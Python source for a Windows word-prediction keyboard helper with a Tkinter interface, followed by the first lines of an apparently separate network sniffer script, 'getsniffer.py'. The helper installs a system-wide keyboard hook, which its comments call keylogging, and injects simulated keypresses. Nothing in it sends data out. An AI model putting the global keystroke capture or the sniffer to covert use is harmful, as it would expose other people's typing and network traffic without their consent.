if new_source_json_data["top_word_list"][current_sentence_split[ word_index - 1 ]]["subsequent_words"][subseq_listitem_index]["word_name"] == current_sentence_split[word_index]:
new_source_json_data["top_word_list"][current_sentence_split[ word_index - 1 ]]["subsequent_words"][subseq_listitem_index]["subseq_frequency"] += 1
new_subsequent = False
break
# New subseq
if new_subsequent == True:
new_source_json_data["top_word_list"][current_sentence_split[ word_index - 1 ]]["subsequent_words"].append( \
{ "word_name" : current_sentence_split[word_index], "subseq_frequency" : 1 })
# Add this new source to sources_list and save that file
sources_list["sources_list"].append({ "source_name" : source_name_entry_field_newname, "source_selected" : 1 })
save_sources(sources_list)
    # Save the new source JSON data as a JSON file
new_source_file = open("sources/" + source_name_entry_field_newname + ".json", "w")
new_source_file.write(json.dumps(new_source_json_data))
new_source_file.close()
# Return to the main window
loading_dialog.destroy()
add_source_dialog.destroy()
update_sources()
return
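# For reference, a source file written by the routine above ends up shaped like
# this (the words and counts are made-up illustration data):
#
#     {
#       "version": "1.1",
#       "top_word_list": {
#         "hello": {
#           "total_frequency": 2,
#           "subsequent_words": [
#             {"word_name": "world", "subseq_frequency": 2}
#           ]
#         }
#       }
#     }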
# Add the menu for switching between views
menu_bar = Menu(root)
menu_bar.add_command(label = "Input", command = menu_bar_input_button)
menu_bar.add_command(label = "Sources", command = menu_bar_sources_button)
menu_bar.add_command(label = "Add Source", command = menu_bar_add_source_button)
menu_bar.add_command(label = "About", command = menu_bar_about_button)
root.config(menu = menu_bar)
# Create the frame object for the keyboard input view
input_frame = Frame(master = root, background = "black", padx = 3, pady = 3)
input_frame.pack(fill = BOTH, expand = TRUE)
# Define the function called when a keyboard input button is pressed
keyEntryEnabled = True
def enterTextFromSuggestion( index ):
global keyEntryEnabled, current_word, previous_word
if index < len( suggestions ):
keyEntryEnabled = False
# Get the remainder of the word to be entered
wordToEnter = suggestions[ index ]
restOfCurrentWord = wordToEnter[ len( current_word ) : ]
# Lift up the keys that were pressed in order to activate this function
SetKeyStateUp(ord( str( index + 1 )[0] ))
# Lift up the keys that can affect keyboard input so that the simulated input isn't messed up
SetKeyStateUp(win32con.VK_LSHIFT)
SetKeyStateUp(win32con.VK_RSHIFT)
SetKeyStateUp(win32con.VK_LCONTROL)
SetKeyStateUp(win32con.VK_RCONTROL)
SetKeyStateUp(win32con.VK_LMENU)
SetKeyStateUp(win32con.VK_RMENU)
# For each character in the text to be entered, get its modifier
# Convert modifier to hex string, and query that string for keys to be held down and the
# key to be typed in
for char in restOfCurrentWord:
keyScanEx = win32api.VkKeyScanEx(char, 0)
            keyModifier, keyVKCode = ((keyScanEx >> i) & 0xff for i in (8, 0))
            if keyScanEx != -1:  # VkKeyScanEx returns -1 when no key maps to this character
# Key entered is able to be entered with the keyboard
if keyModifier == 1:
# Shift key must be pressed down when typing the letter
SetKeyStateUp(keyVKCode)
SetKeyStateUp(win32con.VK_LSHIFT)
SetKeyStateDown(win32con.VK_LSHIFT)
SetKeyStateDown(keyVKCode)
SetKeyStateUp(keyVKCode)
SetKeyStateUp(win32con.VK_LSHIFT)
elif keyModifier == 2:
SetKeyStateUp(keyVKCode)
SetKeyStateUp(win32con.VK_LCONTROL)
SetKeyStateDown(win32con.VK_LCONTROL)
SetKeyStateDown(keyVKCode)
SetKeyStateUp(keyVKCode)
SetKeyStateUp(win32con.VK_LCONTROL)
elif keyModifier == 4:
SetKeyStateUp(keyVKCode)
SetKeyStateUp(win32con.VK_LMENU)
SetKeyStateDown(win32con.VK_LMENU)
SetKeyStateDown(keyVKCode)
SetKeyStateUp(keyVKCode)
SetKeyStateUp(win32con.VK_LMENU)
else:
SetKeyStateUp(keyVKCode)
SetKeyStateDown(keyVKCode)
SetKeyStateUp(keyVKCode)
# Add a space after the word
SetKeyStateUp(win32con.VK_SPACE)
SetKeyStateDown(win32con.VK_SPACE)
SetKeyStateUp(win32con.VK_SPACE)
previous_word = wordToEnter
current_word = ""
update_suggestions()
        # Allow natural key presses again
keyEntryEnabled = True
return
# Adjust input_frame grid pattern
input_frame.grid_rowconfigure(0, minsize = 30, weight = 1)
input_frame.grid_rowconfigure(1, minsize = 30, weight = 1)
input_frame.grid_rowconfigure(2, minsize = 30, weight = 1)
input_frame.grid_rowconfigure(3, minsize = 30, weight = 1)
input_frame.grid_rowconfigure(4, minsize = 30, weight = 1)
input_frame.grid_columnconfigure(0, minsize = 48, weight = 1)
input_frame.grid_columnconfigure(1, minsize = 300, weight = 6)
# Create each label for the other key information top to bottom
keyInfoLabelList = []
keyInfoLabelList.append( Label( input_frame, text = "Alt + 1", background = "black", foreground = "white" ) )
keyInfoLabelList[0].grid(row = 0, column = 0, sticky = W)
keyInfoLabelList.append( Label( input_frame, text = "Alt + 2", background = "black", foreground = "white" ) )
keyInfoLabelList[1].grid(row = 1, column = 0, sticky = W)
keyInfoLabelList.append( Label( input_frame, text = "Alt + 3", background = "black", foreground = "white" ) )
keyInfoLabelList[2].grid(row = 2, column = 0, sticky = W)
keyInfoLabelList.append( Label( input_frame, text = "Alt + 4", background = "black", foreground = "white" ) )
keyInfoLabelList[3].grid(row = 3, column = 0, sticky = W)
keyInfoLabelList.append( Label( input_frame, text = "Alt + 5", background = "black", foreground = "white" ) )
keyInfoLabelList[4].grid(row = 4, column = 0, sticky = W)
# Create each button that will occupy the keyboard input frame
def keyInputButtonPressed( index ):
keyEntryEnabled = False
SetKeyStateUp(win32con.VK_TAB)
SetKeyStateUp(win32con.VK_LMENU)
SetKeyStateDown(win32con.VK_LMENU)
SetKeyStateDown(win32con.VK_TAB)
SetKeyStateUp(win32con.VK_TAB)
SetKeyStateUp(win32con.VK_LMENU)
keyEntryEnabled = True
enterTextFromSuggestion( index )
return
keyInputButtonList = []
keyInputButtonList.append(Button(input_frame, text = "", borderwidth = 3, command = lambda: keyInputButtonPressed( 0 ) ))
keyInputButtonList[0].grid( row = 0, column = 1, padx = 3, pady = 3, sticky = E+W )
keyInputButtonList.append(Button(input_frame, text = "", borderwidth = 3, command = lambda: keyInputButtonPressed( 1 ) ))
keyInputButtonList[1].grid( row = 1, column = 1, padx = 3, pady = 3, sticky = E+W )
keyInputButtonList.append(Button(input_frame, text = "", borderwidth = 3, command = lambda: keyInputButtonPressed( 2 ) ))
keyInputButtonList[2].grid( row = 2, column = 1, padx = 3, pady = 3, sticky = E+W )
keyInputButtonList.append(Button(input_frame, text = "", borderwidth = 3, command = lambda: keyInputButtonPressed( 3 ) ))
keyInputButtonList[3].grid( row = 3, column = 1, padx = 3, pady = 3, sticky = E+W )
keyInputButtonList.append(Button(input_frame, text = "", borderwidth = 3, command = lambda: keyInputButtonPressed( 4 ) ))
keyInputButtonList[4].grid( row = 4, column = 1, padx = 3, pady = 3, sticky = E+W )
# Create the frame object for the sources view
sources_frame = Frame(master = root, background = "black")
sources_frame.grid_rowconfigure(0, weight = 4)
sources_frame.grid_rowconfigure(1, weight = 1)
sources_frame.grid_columnconfigure(0, weight = 1)
# Create the frame for the bottom part of the UI
sources_bottom_ui_frame = Frame(master = sources_frame, background = "black")
sources_bottom_ui_frame.grid(row = 1, column = 0, sticky = N+S+W+E)
sources_bottom_ui_frame.grid_columnconfigure(0, weight = 1)
sources_bottom_ui_frame.grid_columnconfigure(1, weight = 1)
# Create the sources display buttons frame below the display
sources_display_buttons_frame = Frame(master = sources_bottom_ui_frame, background = "black")
sources_display_buttons_frame.grid(row = 0, column = 0)
sources_display_buttons_frame.grid_columnconfigure(0, minsize = 75, weight = 1)
sources_display_buttons_frame.grid_columnconfigure(1, minsize = 75, weight = 1)
# Callback function for rename source button
newNameDialog = None
newNameDialogText = None
newNameDialogButton = None
def rename_source_button_inner_clicked():
global newNameDialog, newNameDialogText, newNameDialogButton
newName = newNameDialogText.get().strip()
if newName != None:
if len( newName ) <= 24:
for source_item in sources_list["sources_list"]:
if source_item["source_name"] == newName:
newNameDialogText.selection_range( 0, END )
tkinter.messagebox.showerror("Name Already Used", "There is already a source that has that same name. Please enter another one.")
return
for character in newName:
                if character in '\\/:*?"<>|':
newNameDialogText.selection_range( 0, END )
tkinter.messagebox.showerror("Name Invalid", "Source names cannot contain any of the following characters:\n\\/:*?\"<>|\nPlease enter another source name.")
return
# Name is OK
os.rename( "sources/" + sources_list["sources_list"][source_element_selected_index]["source_name"] + ".json", "sources/" + newName + ".json" )
sources_list["sources_list"][source_element_selected_index]["source_name"] = newName
save_sources( sources_list )
update_sources()
tkinter.messagebox.showinfo("Source Renamed", "The source has been renamed to \"" + newName + "\".")
newNameDialog.destroy()
return
else:
newNameDialogText.selection_range( 0, END )
tkinter.messagebox.showerror("Name Too Long", "The new name is over 24 characters long. Shorten it before you continue.")
return
return
def rename_source_button_clicked():
global newNameDialog, newNameDialogText, newNameDialogButton, root, sources_list
if source_element_selected_index != None:
newNameDialog = Toplevel()
newNameDialog.title( "Rename Source" )
newNameDialog.resizable( width = FALSE, height = FALSE )
newNameDialog.config( background = "black" )
newNameDialog.geometry("200x50+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][2] / 2) \
- (200 / 2))) + "+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][3] / 2) - (50 / 2))))
# Create the text entry field
newNameDialogText = Entry( master = newNameDialog, width = 24 )
newNameDialogText.insert( INSERT, sources_list["sources_list"][source_element_selected_index]["source_name"] )
newNameDialogText.pack( side = TOP, fill = X, padx = 4, pady = 3 )
# Create the button
newNameDialogButton = Button( master = newNameDialog, text = "Rename Source", command = rename_source_button_inner_clicked )
newNameDialogButton.pack( side = BOTTOM, fill = BOTH, padx = 4, pady = 3 )
newNameDialog.wm_transient( master = root )
newNameDialog.focus_set()
newNameDialog.grab_set()
return
# Callback function for delete source button
def delete_source_button_clicked():
if source_element_selected_index != None:
deletedSourceName = sources_list["sources_list"][source_element_selected_index]["source_name"]
if tkinter.messagebox.askokcancel( "Delete Source", "This will permanently delete the source \"" + deletedSourceName + "\". Are you sure you want to continue?" ):
# Delete the source
os.remove( "sources/" + deletedSourceName + ".json" )
sources_list["sources_list"].pop( source_element_selected_index )
save_sources( sources_list )
update_sources()
tkinter.messagebox.showinfo("Source Deleted", "The source \"" + deletedSourceName + "\"has been deleted.")
return
# Create the rename button for the sources display frame above
rename_source_button = Button(sources_display_buttons_frame, text = "Rename", borderwidth = 3, command = rename_source_button_clicked)
rename_source_button.grid(row = 0, column = 0, sticky = N+S+W+E)
# Create the delete button for the sources display frame above
delete_source_button = Button(sources_display_buttons_frame, text = "Delete", borderwidth = 3, command = delete_source_button_clicked)
delete_source_button.grid(row = 0, column = 1, sticky = N+S+W+E)
# Create the global settings frame below the display
global_settings_frame = Frame(master = sources_bottom_ui_frame, background = "black")
global_settings_frame.grid(row = 0, column = 1, sticky = N+S+E)
# Create the "keep window on top" label
keep_window_on_top_label = Label(global_settings_frame, text = "Keep this window on top?", background = "black", foreground = "white")
keep_window_on_top_label.grid(row = 0, column = 0, sticky = N+S+E)
# Create the "make this window transparent" label
make_window_transparent_label = Label(global_settings_frame, text = "Make this window transparent?", background = "black", foreground = "white")
make_window_transparent_label.grid(row = 1, column = 0, sticky = N+S+E)
# Callback functions if one of the checkbuttons is toggled
def keep_window_on_top_checkbutton_toggled():
root.wm_attributes("-topmost", keep_window_on_top_checkbutton_selected.get())
settings["keep_window_on_top"] = keep_window_on_top_checkbutton_selected.get()
save_settings(settings)
return
def make_window_transparent_checkbutton_toggled():
if make_window_transparent_checkbutton_selected.get():
root.wm_attributes("-alpha", 0.7)
else:
root.wm_attributes("-alpha", 1.0)
settings["make_window_transparent"] = make_window_transparent_checkbutton_selected.get()
save_settings(settings)
return
# Create the "keep window on top" checkbutton
keep_window_on_top_checkbutton_selected = IntVar()
keep_window_on_top_checkbutton = Checkbutton(global_settings_frame, background = "black", \
foreground = "black", highlightbackground = "black", activebackground = "black", activeforeground = "black", \
variable = keep_window_on_top_checkbutton_selected, command = keep_window_on_top_checkbutton_toggled)
if settings["keep_window_on_top"]:
keep_window_on_top_checkbutton.select()
else:
keep_window_on_top_checkbutton.deselect()
keep_window_on_top_checkbutton.grid(row = 0, column = 1, sticky = N+S+E)
# Create the "make this window transparent" checkbutton
make_window_transparent_checkbutton_selected = IntVar()
make_window_transparent_checkbutton = Checkbutton(global_settings_frame, background = "black", \
foreground = "black", highlightbackground = "black", activebackground = "black", activeforeground = "black", \
variable = make_window_transparent_checkbutton_selected, command = make_window_transparent_checkbutton_toggled)
if settings["make_window_transparent"]:
make_window_transparent_checkbutton.select()
else:
make_window_transparent_checkbutton.deselect()
make_window_transparent_checkbutton.grid(row = 1, column = 1, sticky = N+S+E)
# Keyboard input
# Store the previous entered word in order to help prediction results
previous_word = "" # <---- Can be empty
current_word = ""
left_alt_down = False
right_alt_down = False
def on_keyboard_down_event( event ):
global current_word, previous_word, left_alt_down, right_alt_down, keyEntryEnabled
if keyEntryEnabled:
if event.Key == "Lmenu":
left_alt_down = True
elif event.Key == "Rmenu":
right_alt_down = True
elif event.Key == "Space":
# Space
previous_word = current_word.strip()
current_word = ""
update_suggestions()
elif event.Key == "Back":
# Back
# Remove the end character from current_word
if len(current_word) > 0:
current_word = current_word[:len(current_word) - 1]
update_suggestions()
else:
if event.Ascii >= 33 and event.Ascii <= 254 and event.Ascii != 127 \
and left_alt_down == False and right_alt_down == False:
# If the letter entered is a "sentence ender", clear previous_word so that
# suggestions are refreshed from the top level
                if chr(event.Ascii) in (".", "?", "!"):
previous_word = ""
current_word = ""
else:
# Append the ASCII version of the key to the end of current_word
current_word = current_word + str(chr(event.Ascii))
update_suggestions()
return True
def on_keyboard_up_event( event ):
global left_alt_down, right_alt_down, keyEntryEnabled
if keyEntryEnabled:
if event.Key == "Lmenu":
left_alt_down = False
elif event.Key == "Rmenu":
right_alt_down = False
elif event.Ascii >= 49 and event.Ascii <= 53:
# It's one of the 1-5 numeric keys; test for alt key to maybe enter predicted text
if left_alt_down == True:
# Act as though one of the 5 buttons was pressed
SetKeyStateUp(win32con.VK_LMENU)
enterTextFromSuggestion( int( chr( event.Ascii ) ) - 1 ) # Minus one because 1 maps to 0, 2 maps to 1, etc. for this function
SetKeyStateDown(win32con.VK_LMENU)
elif right_alt_down == True:
# Act as though one of the 5 buttons was pressed
SetKeyStateUp(win32con.VK_RMENU)
enterTextFromSuggestion( int( chr( event.Ascii ) ) - 1 ) # Minus one because 1 maps to 0, 2 maps to 1, etc. for this function
SetKeyStateDown(win32con.VK_RMENU)
return True
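# Hotkey scheme implemented above: Alt+1 through Alt+5 (ASCII 49-53) accept the
# corresponding suggestion from any window; the handler momentarily releases
# the held Alt key, injects the rest of the word via enterTextFromSuggestion,
# then presses Alt back down so the user's physical key state is preserved.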
# Functions useful when updating and sorting word suggestions
def get_master_word_list_sorted_by_total_frequency():
source_master_list = []
for master_word_key in source_master_object:
source_master_list.append( { "name" : master_word_key, \
"subsequent_words" : source_master_object[master_word_key]["subsequent_words"], \
"total_frequency" : source_master_object[master_word_key]["total_frequency"] } )
source_master_list.sort( key = lambda word : word[ "total_frequency" ], reverse = True )
return source_master_list
def get_master_word_list_sorted_by_total_frequency_sans_removed_words( removed_words_list ):
source_master_list = []
for master_word_key in source_master_object:
source_master_list.append( { "name" : master_word_key, \
"subsequent_words" : source_master_object[master_word_key]["subsequent_words"], \
"total_frequency" : source_master_object[master_word_key]["total_frequency"] } )
source_master_list.sort( key = lambda word : word[ "total_frequency" ], reverse = True )
return [ item for item in source_master_list if not item["name"] in removed_words_list ]
suggestions = []
def update_suggestions():
global source_master_object, current_word, previous_word, suggestions
# Get the top five suggestions based on previous_word and what's currently in current_word
del suggestions[:]
suggestions = []
# Test if we can use previous_word for predictions
if previous_word in source_master_object:
# Word is in source_master_object so we can look at subsequent words
# First, get subsequent_words whose first letters match current_word, rank those by subseq_frequency, then
# second, rank remaining subsequent_words by subseq_frequency and add those to the rank.
# Finally, if those words don't fill the 5 recommendation bars, rank the top list similarly to below
prev_word_subsequent_words = source_master_object[ previous_word ][ "subsequent_words" ]
        # Divide subsequent_words into two further arrays: one containing the words whose beginning
        # characters match what has been entered in current_word, and one with the words that don't match.
        # The initial predictions come from the first array, then from the second array (both sorted
        # by their frequency value), and finally from the global words object with these words taken out,
        # sorted by "total_frequency".
removed_words = []
prev_word_subsequent_words_matching = []
for listitem in prev_word_subsequent_words:
if listitem["word_name"].lower().find( current_word.lower() ) == 0:
removed_words.append( listitem["word_name"] )
prev_word_subsequent_words_matching.append( listitem )
# Sort each array by subseq_frequency
prev_word_subsequent_words_matching.sort( key = lambda word : word[ "subseq_frequency" ], reverse = True )
# Populate suggestions array with matching words
for listitem in prev_word_subsequent_words_matching:
suggestions.insert( len( suggestions ), listitem["word_name"] )
# If still not full, populate suggestions with words matching current_word from toplevel
# without including removed_words. This list is sorted by frequency.
toplevel_matching_words_sans_removed_words = []
if len( suggestions ) < 5:
for word in source_master_object:
# First test to make sure the word hasn't already been removed from "suggestables"...
if not word in removed_words:
# Test to see if the word could possibly overlap with current_word
if word.lower().find( current_word.lower() ) == 0:
removed_words.append( word )
toplevel_matching_words_sans_removed_words.append( word )
# Sort the matching toplevel words by frequency in source_master_object
toplevel_matching_words_sans_removed_words.sort( key = lambda word : source_master_object[ word ][ "total_frequency" ], reverse = True )
for word_index in range( 0, len( toplevel_matching_words_sans_removed_words ) ):
suggestions.insert( len( suggestions ), toplevel_matching_words_sans_removed_words[ word_index ] )
# If suggestions STILL isn't full, populate it with words from the toplevel list
# sorted by total frequency
if len( suggestions ) < 5:
for listitem in get_master_word_list_sorted_by_total_frequency_sans_removed_words( removed_words ):
if not len( suggestions ) < 5:
break
suggestions.insert( len( suggestions ), listitem["name"] )
else:
# Just get source_master_object words whose first letters match current_word, rank these by total_frequency,
# and append to the end of those the remaining words sorted by frequency
name_frequency_pairs = []
removed_words = []
for word in source_master_object:
# Check if current_word matches first letters of this word
if word.lower().find( current_word.lower() ) == 0:
name_frequency_pairs.append( { "name" : word, "frequency" : source_master_object[ word ][ "total_frequency" ] } )
# Add this matching word to "removed_words"
removed_words.append( word )
# Sort name_frequency_pairs
name_frequency_pairs.sort( key = lambda word : word[ "frequency" ], reverse = True )
# Copy values from name_frequency_pairs to suggestions
for pair_index in range( 0, len( name_frequency_pairs ) ):
suggestions.insert( pair_index, name_frequency_pairs[ pair_index ][ "name" ] )
# Fill the rest of the remaining suggestions array with words from master list
# sorted by total_frequency
if len( suggestions ) < 5:
for listitem in get_master_word_list_sorted_by_total_frequency_sans_removed_words( removed_words ):
if not len( suggestions ) < 5:
break
suggestions.insert( len( suggestions ), listitem["name"] )
# Update label values based on suggestions
for label_index in range( 0, 5 ):
if label_index < len( suggestions ):
keyInputButtonList[ label_index ].config( text = suggestions[ label_index ] )
else:
keyInputButtonList[ label_index ].config( text = "" )
return
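# Worked example (hypothetical data): with previous_word "good" whose
# subsequent_words are morning (3) and mood (1), and current_word "mo",
# suggestions start as ["morning", "mood"] ordered by subseq_frequency, then
# any other top-level words starting with "mo" ordered by total_frequency, and
# the list is finally padded to five entries from the remaining words by
# total_frequency.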
# Store the source element activated checkbox values
source_element_activated_variablelist = []
# Initialize the variable for sources_info_display_frame
sources_info_display_frame = None
# Variable that defines which item in the source list is selected
source_element_selected_index = None
# Initialize the lists that hold each label/checkbutton widget combo from the source list display
source_elements_label_widget_list = []
source_elements_checkbutton_widget_list = []
# Function for when a source element checkbox is toggled
def source_element_checkbutton_toggled():
global source_element_selected_index, source_elements_checkbutton_widget_list, source_element_activated_variablelist
for source_index3 in range( 0, len( sources_list["sources_list"] )):
sources_list[ "sources_list" ][ source_index3 ][ "source_selected" ] = source_element_activated_variablelist[ source_index3 ].get()
save_sources( sources_list )
update_source_masterobject()
return
# Function callback for source element label clicked by mouse
def source_element_label_widget_clicked( event ):
global source_element_selected_index, source_elements_label_widget_list, source_elements_checkbutton_widget_list
for source_index2 in range( 0, len( sources_list["sources_list"] )):
if source_elements_label_widget_list[ source_index2 ] == event.widget:
source_elements_label_widget_list[ source_index2 ].config( background = "blue", foreground = "white" )
source_elements_checkbutton_widget_list[ source_index2 ].config( background = "blue", activebackground = "blue", highlightbackground = "blue" )
source_element_selected_index = source_index2
else:
source_elements_label_widget_list[ source_index2 ].config( background = "white", foreground = "black" )
source_elements_checkbutton_widget_list[ source_index2 ].config( background = "white", activebackground = "white", highlightbackground = "white" )
def source_info_element_content_frame_configure( canvas, window, scrollbar ):
canvas.configure( scrollregion = canvas.bbox("all") )
canvas.itemconfig( window, width = canvas.winfo_width() - scrollbar.winfo_width() - 10 )
update_sources_masterobject_window = None
update_sources_masterobject_window_label = None
update_source_masterobject_worker_thread_return_value = True
def update_source_masterobject_worker_thread():
global source_master_object, update_source_masterobject_worker_thread_return_value
source_master_object.clear()
activated_sources_json_data = []
for source in sources_list[ "sources_list" ]:
if source[ "source_selected" ] == 1:
# Add this source's JSON contents to activated_sources_json_data
openedFile = {}
fileText = ""
if os.path.isfile(os.path.dirname(os.path.realpath(__file__)) + "/sources/" + source[ "source_name" ] + ".json"):
openedFile = open("sources/" + source[ "source_name" ] + ".json", "r")
fileText = openedFile.read()
openedFile.close()
# Now try to JSON decode our read file text
try:
activated_sources_json_data.append(json.loads(fileText))
except ValueError:
tkinter.messagebox.showerror("JSON Decode Error", "Couldn't decode JSON from source file \"sources/" + source[ "source_name" ] + ".json\". Unable to properly build master object.")
update_source_masterobject_worker_thread_return_value = False
# JSON loaded successfully
else:
tkinter.messagebox.showerror("File Load Error", "Couldn't load source file \"sources/" + source[ "source_name" ] + ".json\". Unable to properly build master object.")
update_source_masterobject_worker_thread_return_value = False
# All source data to be used is now loaded into the list activated_sources_json_data
# Now assemble each separate source file into one masterobject
for activated_source in activated_sources_json_data:
for word in activated_source[ "top_word_list" ]:
if word in source_master_object:
# Word already exists in source_master_object
# Add this word's total_frequency to master object
source_master_object[ word ][ "total_frequency" ] += activated_source[ "top_word_list" ][ word ][ "total_frequency" ]
# Merge the subsequent_words from this with master object's
for subsequent_word_index in range( 0, len( activated_source[ "top_word_list" ][ word ][ "subsequent_words" ] ) ):
subseq_exists_in_master = False
for mastersource_subsequent_word_index in range( 0, len( source_master_object[ word ][ "subsequent_words" ] ) ):
# Check if subsequent word already exists in master object
if activated_source[ "top_word_list" ][ word ][ "subsequent_words" ][ subsequent_word_index ][ "word_name" ] == \
source_master_object[ word ][ "subsequent_words" ][ mastersource_subsequent_word_index ][ "word_name" ]:
                            # Already exists in master object, so just add the frequency to the master
source_master_object[ word ][ "subsequent_words" ][ mastersource_subsequent_word_index ][ "subseq_frequency" ] += \
activated_source[ "top_word_list" ][ word ][ "subsequent_words" ][ subsequent_word_index ][ "subseq_frequency" ]
subseq_exists_in_master = True
if subseq_exists_in_master == False:
# Is new subsequent word, so just copy contents of current one to master
source_master_object[ word ][ "subsequent_words" ].append( activated_source[ "top_word_list" ][ word ][ "subsequent_words" ][ subsequent_word_index ] )
else:
# New word not in master object
# Create new entry and copy over the contents from this source
source_master_object[ word ] = activated_source[ "top_word_list" ][ word ]
if update_sources_masterobject_window != None:
update_sources_masterobject_window.destroy()
update_source_masterobject_worker_thread_return_value = True
update_suggestions()
root.focus_force()
return
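# Illustrative only (not part of the original program): a minimal sketch of the
# source-file JSON shape that the merge logic above assumes. Key names are taken
# from the code; the words and counts below are made up.
_EXAMPLE_SOURCE_JSON = {
    "top_word_list": {
        "the": {
            "total_frequency": 42,
            "subsequent_words": [
                { "word_name": "quick", "subseq_frequency": 3 },
                { "word_name": "next", "subseq_frequency": 7 }
            ]
        }
    }
}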
def update_source_masterobject():
global source_master_object, update_sources_masterobject_window, \
update_sources_masterobject_window_label, update_source_masterobject_worker_thread_return_value
update_source_masterobject_worker_thread_return_value = True
update_sources_masterobject_window = Toplevel()
update_sources_masterobject_window.title("Updating Compound Sourcefile Data")
update_sources_masterobject_window.resizable(width = FALSE, height = FALSE)
update_sources_masterobject_window.config(background = "black")
update_sources_masterobject_window.wm_attributes("-disabled", "1")
update_sources_masterobject_window.geometry("300x50+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][2] / 2) \
- (300 / 2))) + "+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][3] / 2) - (50 / 2))))
update_sources_masterobject_window_label = Label(update_sources_masterobject_window, text = "Updating combined sourcefile data...\nPlease wait...", justify = CENTER, background = "black", foreground = "white")
update_sources_masterobject_window_label.place(relx = 0.5, rely = 0.5, anchor = CENTER)
update_sources_masterobject_window.wm_transient(master = root)
update_sources_masterobject_window.protocol('WM_DELETE_WINDOW', None)
update_sources_masterobject_window.focus_set()
update_sources_masterobject_window.grab_set()
worker_thread = threading.Thread( target = update_source_masterobject_worker_thread )
worker_thread.daemon = True
worker_thread.start()
return update_source_masterobject_worker_thread_return_value
def sourceframe_background_clicked(event):
global source_element_selected_index, source_elements_label_widget_list, source_elements_checkbutton_widget_list
source_element_selected_index = None
for source_index2 in range( 0, len( sources_list["sources_list"] )):
source_elements_label_widget_list[ source_index2 ].config( background = "white", foreground = "black" )
source_elements_checkbutton_widget_list[ source_index2 ].config( background = "white", activebackground = "white", highlightbackground = "white" )
return
def update_sources():
# Two major things are supposed to happen here:
# First, the sources info panel gets updated with source names
# Second, the convergent source object that predictions come from is remade with currently activated sources
# This function assumes that sources_list is updated and each name in that file will link to a source file
global sources_list, sources_info_display_frame, source_element_activated_variablelist, \
source_element_selected_index, source_elements_label_widget_list, source_elements_checkbutton_widget_list
source_element_selected_index = None
# Empty the variable lists
del source_element_activated_variablelist[:]
del source_elements_label_widget_list[:]
del source_elements_checkbutton_widget_list[:]
# Create the sources informational display frame for the sources view
if sources_info_display_frame != None:
if sources_info_display_frame.winfo_exists():
sources_info_display_frame.destroy()
sources_info_display_frame = Frame(master = sources_frame, background = "gray", borderwidth = 2, relief = FLAT)
sources_info_display_frame.grid(row = 0, column = 0, sticky = N+S+E+W)
sources_info_display_frame.grid_rowconfigure(0, weight = 1)
sources_info_display_frame.grid_rowconfigure(1, weight = 9)
sources_info_display_frame.grid_columnconfigure(0, weight = 4)
sources_info_display_frame.grid_columnconfigure(1, weight = 1)
# First, update the frame
source_info_name_label = Label(sources_info_display_frame, text = "Source Name", font = ("Helvetica", 10), background = "gray", padx = 4, pady = 4, foreground = "white")
source_info_name_label.grid(row = 0, column = 0, sticky = N+S+W)
source_info_activated_label = Label(sources_info_display_frame, text = "Activated?", font = ("Helvetica", 10), background = "gray", anchor = W, padx = 4, pady = 4, foreground = "white")
source_info_activated_label.grid(row = 0, column = 1, sticky = N+S+W)
# Frame for actual source elements
source_info_elements_frame = Frame(master = sources_info_display_frame, background = "white")
source_info_elements_frame.grid(row = 1, column = 0, columnspan = 2, padx = 4, pady = 2, sticky = N+S+E+W)
# Canvas element content frame container
source_info_elements_canvas = Canvas(master = source_info_elements_frame, height = 85, borderwidth = 0, background = "white")
source_info_elements_canvas.pack(side = LEFT, fill = BOTH, expand = TRUE)
# Scrollbar for actual source elements
source_info_elements_scrollbar = Scrollbar( master = source_info_elements_frame, orient = "vertical", command = source_info_elements_canvas.yview )
source_info_elements_scrollbar.pack(side = RIGHT, fill = Y)
source_info_elements_canvas.configure( yscrollcommand = source_info_elements_scrollbar.set )
# Frame for actual element info content
# Render with a white background if no elements currently exist so that a black dot doesn't appear in the container frame's top-left corner
if len( sources_list["sources_list"] ) > 0:
source_info_element_content_frame = Frame(master = source_info_elements_canvas, background = "black")
else:
source_info_element_content_frame = Frame(master = source_info_elements_canvas, background = "white")
source_info_element_content_frame.grid_columnconfigure(0, weight = 5)
source_info_element_content_frame.grid_columnconfigure(1, weight = 1)
source_info_elements_canvas_window = source_info_elements_canvas.create_window( (0, 0), window = source_info_element_content_frame, anchor = NW )
source_info_element_content_frame.bind( "<Configure>", lambda event, canvas = source_info_elements_canvas, \
window = source_info_elements_canvas_window, scrollbar = source_info_elements_scrollbar: source_info_element_content_frame_configure( canvas, window, scrollbar ) )
source_info_elements_canvas.bind( "<Button-1>", sourceframe_background_clicked )
for source_index in range( 0, len( sources_list["sources_list"] )):
# First, populate the info frame with each source
source_elements_label_widget_list.insert( source_index, Label(source_info_element_content_frame, text = sources_list["sources_list"][source_index]["source_name"], anchor = W, background = "white", foreground = "black"))
source_elements_label_widget_list[ source_index ].grid(row = source_index, column = 0, padx = 1, pady = 1, sticky = N+S+E+W)
source_elements_label_widget_list[ source_index ].bind( "<Button-1>", lambda event : source_element_label_widget_clicked( event ) )
source_element_activated_variablelist.insert( source_index, IntVar() )
source_elements_checkbutton_widget_list.insert( source_index, Checkbutton( source_info_element_content_frame, background = "white", \
foreground = "black", highlightbackground = "white", activebackground = "white", \
variable = source_element_activated_variablelist[source_index], anchor = CENTER, command = source_element_checkbutton_toggled ) )
if sources_list["sources_list"][source_index]["source_selected"] == 1:
source_elements_checkbutton_widget_list[ source_index ].select()
else:
source_elements_checkbutton_widget_list[ source_index ].deselect()
source_elements_checkbutton_widget_list[ source_index ].grid(row = source_index, column = 1, padx = 1, pady = 1, sticky = N+S+E+W)
update_source_masterobject()
return
# Keylogging components
hook_manager = pyHook.HookManager()
hook_manager.SubscribeKeyDown(on_keyboard_down_event)
hook_manager.SubscribeKeyUp(on_keyboard_up_event)
# Attach hook_manager to the physical keyboard
hook_manager.HookKeyboard()
update_sources()
root.mainloop()
|
getsniffer.py
|
import socket
import os
import threading
import binascii
from lib.udp_sender.udp_sender import udp_sender
outputfilename = ""
probemaster = []
pack = []
output_tuple = []
output = []
probehelplist = []
helpdata=[]
def getsniffer(host, args):
if args.noise != None:
noise = args.noise
if args.output:
outputfilename = args.output
if args.timeout != "True" and args.timeout != None:
timeout = args.timeout
if args.host:
